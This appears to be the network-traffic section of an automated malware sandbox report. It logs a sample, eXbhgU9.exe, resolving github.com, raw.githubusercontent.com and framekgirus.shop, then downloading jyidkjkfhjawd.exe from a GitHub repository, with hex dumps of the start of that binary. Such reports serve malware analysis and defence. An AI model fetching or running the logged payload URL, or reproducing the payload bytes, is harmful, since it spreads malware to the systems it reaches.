                                                                                                                Dec 30, 2024 11:59:42.056005001 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.056020975 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.507550955 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.507622957 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.509253979 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.509265900 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.509500980 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.519104958 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.519227982 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.519256115 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.995590925 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.995712042 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:42.995796919 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.996476889 CET49739443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:42.996498108 CET44349739104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.302922010 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.302949905 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.303123951 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.303494930 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.303507090 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.769462109 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.769545078 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.771418095 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.771429062 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.771675110 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.772766113 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.772984982 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.773020983 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.773143053 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.773143053 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:43.773153067 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:43.819331884 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:44.403143883 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:44.403239965 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:44.403346062 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:44.403465033 CET49741443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:44.403480053 CET44349741104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:44.876211882 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:44.876240015 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:44.876401901 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:44.876727104 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:44.876741886 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:45.317574024 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:45.317754030 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:45.318986893 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:45.318995953 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:45.319238901 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:45.330440998 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:45.330530882 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:45.330538034 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:56.966914892 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:56.967070103 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:56.967205048 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:56.967334986 CET49743443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:56.967361927 CET44349743104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.411206961 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.411273956 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.411358118 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.411823034 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.411858082 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.871356964 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.871611118 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.902256966 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.902302980 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.902615070 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.916203976 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922096014 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922156096 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.922287941 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922338009 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.922471046 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922509909 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.922667027 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922718048 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.922924995 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.922970057 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.923121929 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.923163891 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.923186064 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.923202038 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.923289061 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.923326015 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.923367023 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.923451900 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.923512936 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.932456017 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.932642937 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.932698011 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.932732105 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.932795048 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:57.932833910 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:57.937259912 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.509438038 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.509547949 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.509624004 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.509910107 CET49744443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.509927034 CET44349744104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.520682096 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.520704985 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.520807981 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.521136999 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.521153927 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.960968018 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.961086035 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.965480089 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.965491056 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.965748072 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:59.969655037 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.969671965 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:59.969732046 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 12:00:00.427232981 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 12:00:00.427361012 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 12:00:00.427426100 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 12:00:00.427592993 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 12:00:00.427606106 CET44349745104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 12:00:00.427618980 CET49745443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 12:00:00.427623987 CET44349745104.21.18.19192.168.2.4
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 30, 2024 11:59:35.209794044 CET5970853192.168.2.41.1.1.1
                                                                                                                Dec 30, 2024 11:59:35.216619015 CET53597081.1.1.1192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.394910097 CET6243953192.168.2.41.1.1.1
                                                                                                                Dec 30, 2024 11:59:36.401918888 CET53624391.1.1.1192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.527523041 CET6350453192.168.2.41.1.1.1
                                                                                                                Dec 30, 2024 11:59:38.540111065 CET53635041.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 30, 2024 11:59:35.209794044 CET192.168.2.41.1.1.10xcaf4Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:36.394910097 CET192.168.2.41.1.1.10x7994Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:38.527523041 CET192.168.2.41.1.1.10x99f5Standard query (0)framekgirus.shopA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 30, 2024 11:59:35.216619015 CET1.1.1.1192.168.2.40xcaf4No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:36.401918888 CET1.1.1.1192.168.2.40x7994No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:36.401918888 CET1.1.1.1192.168.2.40x7994No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:36.401918888 CET1.1.1.1192.168.2.40x7994No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:36.401918888 CET1.1.1.1192.168.2.40x7994No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:38.540111065 CET1.1.1.1192.168.2.40x99f5No error (0)framekgirus.shop104.21.18.19A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 11:59:38.540111065 CET1.1.1.1192.168.2.40x99f5No error (0)framekgirus.shop172.67.179.160A (IP address)IN (0x0001)false
                                                                                                                • github.com
                                                                                                                • raw.githubusercontent.com
                                                                                                                • framekgirus.shop
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449730140.82.121.44437340C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:35 UTC116OUTGET /arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1
                                                                                                                Host: github.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-12-30 10:59:36 UTC567INHTTP/1.1 302 Found
                                                                                                                Server: GitHub.com
                                                                                                                Date: Mon, 30 Dec 2024 10:59:36 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                Access-Control-Allow-Origin:
                                                                                                                Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                X-Frame-Options: deny
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                2024-12-30 10:59:36 UTC3383INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449731185.199.110.1334437340C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:36 UTC127OUTGET /arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1
                                                                                                                Host: raw.githubusercontent.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-12-30 10:59:37 UTC903INHTTP/1.1 200 OK
                                                                                                                Connection: close
                                                                                                                Content-Length: 1282048
                                                                                                                Cache-Control: max-age=300
                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "e55fa9c7938c15739085744aba146381aba9c450768a46298b23f716bcfc6753"
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-Frame-Options: deny
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                X-GitHub-Request-Id: BF68:11C8E1:497A95:52783C:67727D0D
                                                                                                                Accept-Ranges: bytes
                                                                                                                Date: Mon, 30 Dec 2024 10:59:37 GMT
                                                                                                                Via: 1.1 varnish
                                                                                                                X-Served-By: cache-nyc-kteb1890035-NYC
                                                                                                                X-Cache: MISS
                                                                                                                X-Cache-Hits: 0
                                                                                                                X-Timer: S1735556377.933171,VS0,VE104
                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                X-Fastly-Request-ID: 77ddab878468d8f33f5f44774790959f89a6ba90
                                                                                                                Expires: Mon, 30 Dec 2024 11:04:37 GMT
                                                                                                                Source-Age: 0
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 20 17 70 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 02 04 00 00 b2 00 00 00 00 00 00 b3 24 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 50 2d 00 14 02 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL pg$@;@ P-
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: bd ac 1b b8 be 3a 9c 43 88 02 f4 bb 71 34 96 e2 84 03 b0 89 59 fa ab fb 0a 90 43 82 fd 40 fa 60 7c 3e e1 c2 61 5d 9d e4 f1 47 95 3c 28 a7 75 9a 27 5b 90 f6 05 bf 55 61 d4 2e 73 d8 a4 dd 82 85 2a b3 b5 af 28 7d 3d 8d 89 9b 66 29 75 aa 1d 35 ce 88 1a fa d8 b9 86 30 2b fc 5b d0 1d f6 c4 52 10 de cb 6b 54 86 05 43 f4 d6 01 c0 67 fc 09 6e e4 71 b1 57 f4 c8 68 6c 8b e5 c6 08 70 58 44 c7 f8 a3 c8 59 5c 67 f4 c5 75 37 37 2c de 4c ff 71 da 7f fd d1 17 29 f2 19 62 f9 a7 be 64 c1 0f 73 d6 a5 ba 35 47 6c 3b db 4c ba 1a 30 55 ab 03 2d 72 73 37 90 5f e0 93 74 48 2b 45 dc d5 4d bf 53 d4 f1 73 8e cc 3b c5 50 e3 59 27 12 66 f7 48 d5 80 74 5f 1b ea 85 28 6f df 49 8a 7f 71 6c b0 ea 29 15 b2 2d 72 55 09 ef 94 14 0b 67 13 dd f6 e4 56 dd f0 5e 98 ca 43 2e cb 48 b4 29 ad f6 7e
                                                                                                                Data Ascii: :Cq4YC@`|>a]G<(u'[Ua.s*(}=f)u50+[RkTCgnqWhlpXDY\gu77,Lq)bds5Gl;L0U-rs7_tH+EMSs;PY'fHt_(oIql)-rUgV^C.H)~
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 19 4e 1c ad de ee ab 08 34 08 23 2d ac 6c 66 8c 53 04 cc da 30 ef c2 16 8d fd 90 34 08 60 7c 64 ef ab 24 38 67 ce af 75 df b6 3b 61 c6 e6 6d b5 64 44 ae 89 84 d2 39 79 7a d0 c0 2f 90 ab 37 cf 81 07 82 b9 39 85 81 94 31 7c 5a 0f 11 78 07 f1 18 47 be d3 ce 66 99 aa ca 56 17 02 4c 23 5f 35 8b 6a e5 ee a5 88 17 06 7c 4b 81 68 b9 50 8f 17 b7 61 95 a7 3f ad fd fd 23 9f 48 a0 cd 45 08 6d ec c8 e5 3f 78 bd 21 7d cf 58 3d f3 95 8a 77 fd 03 53 dd 8a e9 aa aa b0 6b f9 9a a8 e8 82 2d 8f 9d 37 4b 65 b3 b6 6e bb 6e 45 a0 5f ef 07 e8 bf 56 53 e5 db 48 9c 2b 2c a4 3c 27 a0 bd da 98 dc d2 e9 10 08 1b 8e 49 7d e5 1e 0a 37 7e 89 f0 3e ed b3 bb 6a 0b 8d 51 9c 2d 53 57 99 cd 31 ae 4b 61 74 04 9e fa be 6c 05 cb 15 eb d9 dc ba 1a 2f 5a 72 0b 03 61 53 07 de 05 c3 3a 74 39 8a e6
                                                                                                                Data Ascii: N4#-lfS04`|d$8gu;amdD9yz/791|ZxGfVL#_5j|KhPa?#HEm?x!}X=wSk-7KennE_VSH+,<'I}7~>jQ-SW1Katl/ZraS:t9
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 02 a6 76 e5 f1 62 9a 08 2f a9 25 89 6a 79 32 31 a8 63 72 56 02 39 6a b0 1a c6 c9 4c 5b 7e 33 94 78 25 22 1d d8 ef 85 54 6d 65 55 4d ec 68 73 13 85 a2 6d 36 f4 63 69 74 20 8f 62 19 a7 ba 00 5f e9 20 78 c2 2a fc de f4 f5 94 aa 59 57 50 bf 71 ec c3 24 51 1f e1 a3 8b 21 b2 a3 80 18 db c4 30 7d 87 85 c4 ac 5d af 44 db f6 1f c2 c3 ea 81 95 c7 d7 c2 f4 7a 7e c6 17 06 df de c5 50 b6 59 9f 0c be 15 52 b7 ec 96 cc 7c 9f f8 0f 4a 29 43 d1 3e 34 cc b4 b3 b8 7a c5 2c f1 70 0b 3e 54 66 6e 29 11 c9 68 ce bb 3a 75 80 6e 55 17 38 c2 03 6e b5 8c 61 48 c3 3f a4 9a b7 c6 1b cd a1 f5 86 14 cd 79 df 1a 12 c3 94 39 1b f0 e4 72 f8 01 73 1c 24 ce ff c6 77 fe 4d d6 35 5a f2 12 5d 35 ac c4 4b 1f aa 23 f8 ea 00 a4 64 61 17 fd 48 55 95 31 8f 6e c2 60 39 75 9c fc 43 25 c1 6d 13 5f ba
                                                                                                                Data Ascii: vb/%jy21crV9jL[~3x%"TmeUMhsm6cit b_ x*YWPq$Q!0}]Dz~PYR|J)C>4z,p>Tfn)h:unU8naH?y9rs$wM5Z]5K#daHU1n`9uC%m_
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 07 6e 3b 06 01 27 88 e5 a4 8a da 1a 93 86 93 4d dd dc a9 cb 0b 9d f3 a5 1c a2 a5 d3 77 8d ab 67 7b e6 ee 3b b8 eb a3 7e 4e 4e 76 4c 38 39 25 de 80 24 31 88 90 9b ec e1 1b 49 a6 83 d9 7b 4b 06 6b 01 60 2f 13 bc 24 81 4f c9 43 a0 0a c3 db 24 d7 d9 cb 86 ed 04 3f 08 a0 0f 96 0f aa 75 1c 1d 92 15 bc 26 a6 9d f6 92 9f 51 86 42 38 b8 70 c0 ef 05 8d 82 31 5d d2 fd e3 56 fe 40 6f af fe 16 fb f8 5b 33 3f e4 7a 62 33 d9 84 e7 c3 57 07 40 c3 a5 f9 47 45 31 b6 45 76 7d 15 c1 06 45 af 83 72 d0 3b 27 f8 ef e2 be fa a9 ab 80 68 ac ee 45 a3 32 f6 ba 48 06 ab 15 ee f7 0d b5 db 91 0b 64 90 68 5e 1e 8e 65 ee a7 ba 96 0c 0e 08 06 82 0f 63 c8 b5 82 30 92 fe f0 cc e6 96 2e ec 87 ca b2 15 8d 0a b4 5a 9f e0 50 b2 e1 a2 00 d0 10 65 df a3 2c 70 af b0 4e 12 6d 14 7f 88 6b cc a6 08
                                                                                                                Data Ascii: n;'Mwg{;~NNvL89%$1I{Kk`/$OC$?u&QB8p1]V@o[3?zb3W@GE1Ev}Er;'hE2Hdh^ec0.ZPe,pNmk
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: ac d9 12 91 56 dd a6 66 81 da 65 07 28 7e 7a 39 39 d8 49 bf cd d7 e2 6a 69 df c1 cc 08 63 fd 31 58 3b 15 a8 c9 62 34 b1 26 08 80 25 f7 a6 ca eb 0a 62 e6 c7 3b eb 5f fc 20 cb 5b ba c2 d8 99 b6 74 54 d6 d6 8d e2 ab 65 ef 16 08 c6 65 4f 0d b8 c0 d5 63 ff ea 6d 2f fb d1 2c b4 9b 76 e7 63 16 36 e0 be 78 41 7c 30 73 50 ed 18 1a 88 0f 04 59 2a b8 ea 38 27 38 df 27 f0 5b 03 78 5a 6a 7b 6b f0 22 d3 cf 84 f6 af 53 28 21 d4 55 0b a6 72 36 49 5f 90 59 55 7f 81 2d 00 d9 65 10 ee ff 7e 03 99 9e 08 8d 5d 7f 26 d6 1f ab a9 ef c2 43 e2 5c ac f8 45 9f e0 c9 e4 ba 02 20 22 25 76 4b 92 e8 ac 24 3c bf 37 0a 4b f6 5f fb 68 19 a2 d3 34 d4 0a 82 f8 9c f1 a5 2c 9e b9 fe b0 fb 19 7f eb b8 5e c5 0d 25 19 69 df c2 c8 65 45 f1 71 77 13 c1 03 9c dc 9f df 85 13 f4 5a d9 38 16 12 0d 69
                                                                                                                Data Ascii: Vfe(~z99Ijic1X;b4&%b;_ [tTeeOcm/,vc6xA|0sPY*8'8'[xZj{k"S(!Ur6I_YU-e~]&C\E "%vK$<7K_h4,^%ieEqwZ8i
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: b9 e5 79 44 d8 a3 44 c2 44 e6 02 94 c5 c1 f5 4a bc 38 88 9b 3c 91 23 19 18 b0 10 eb ac 22 c2 18 f7 ac aa b9 c1 3f 3d 2d e9 55 01 ca 78 75 a7 18 09 e2 81 71 d8 c9 9f 23 7f ad 7f 1f 0e 8b b1 3b cc e2 2d 85 7b e4 ae 7c 71 cb 7d 4e 2c 8e aa ba 12 8a a9 1e 47 53 aa b4 83 2d 95 23 13 47 94 03 b0 9a 37 07 fa d5 b6 fa 3d 6b c3 a6 e9 d0 0e 30 5f 42 dc 51 a8 e7 13 40 2a e2 37 c1 62 95 de a8 4f 9a de 22 d5 ea f2 da 11 ee 82 1e 78 f8 17 26 55 8b 14 aa 85 6b 98 43 20 bf d7 0d b3 ac 3b ef 51 e9 34 93 fe 03 c8 38 ce c2 c6 b6 a1 91 95 f8 9a d3 1b e5 ea 5f a9 ae 1f 55 27 25 b7 a0 c8 a1 95 97 f4 0a ce ab af 55 a6 c9 0c b0 cc c8 5b 4a f5 41 e3 06 06 95 e6 36 68 8c 87 83 b8 8e fa bf 8d f8 da b1 17 d3 12 f5 50 01 c7 e9 26 ef cf ea 72 1e f8 fb ca 2a 3c c5 0d e6 03 c1 af aa 88
                                                                                                                Data Ascii: yDDDJ8<#"?=-Uxuq#;-{|q}N,GS-#G7=k0_BQ@*7bO"x&UkC ;Q48_U'%U[JA6hP&r*<
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: c2 6c cd be 1c a1 af 7d 77 64 27 9f 05 71 57 7f 12 ac 6e 8e 2d a5 8a 16 7c ef a2 f7 2d 89 0a f4 c6 ee 8f db 44 09 bf c8 c4 46 3a e5 74 12 94 20 bb ba 1e 4c b4 93 9d 52 4c 9a b9 ff 5a 57 74 d2 b8 17 1b b5 50 ac a1 4a 1d 48 9b b1 26 58 02 12 8f 00 48 dd c5 61 f7 ee a6 1f 8e a1 6a 20 4b 7f 7a 37 53 f9 48 a9 fc b8 83 87 40 f9 a5 7e b0 5e 84 26 c2 9b 59 de d0 c1 3c 42 df 52 fe fc 96 cd b4 3d 4c ed c0 da 4b 2a 1f b2 e7 77 e6 f4 1e 36 6a 69 89 79 2e 30 91 c6 57 58 1a 2f 81 2c 84 ff 8a 9f 23 de d4 a3 39 9a 96 07 65 22 ff a9 2d bd 40 dd fc d0 62 d5 98 ce a9 f1 a6 26 d4 4a 85 b6 98 37 00 9f 4f b0 f9 7f a3 25 35 8e 9b 29 3e 0c 84 64 23 03 a3 ea e4 d0 59 3b 2f ae 82 c3 f0 b3 5b c8 56 22 79 39 f5 3b ca 94 2f 59 e3 ac e4 ba 30 86 23 f8 b2 36 9b da 49 bd 4e d4 91 82 6d
                                                                                                                Data Ascii: l}wd'qWn-|-DF:t LRLZWtPJH&XHaj Kz7SH@~^&Y<BR=LK*w6jiy.0WX/,#9e"-@b&J7O%5)>d#Y;/[V"y9;/Y0#6INm
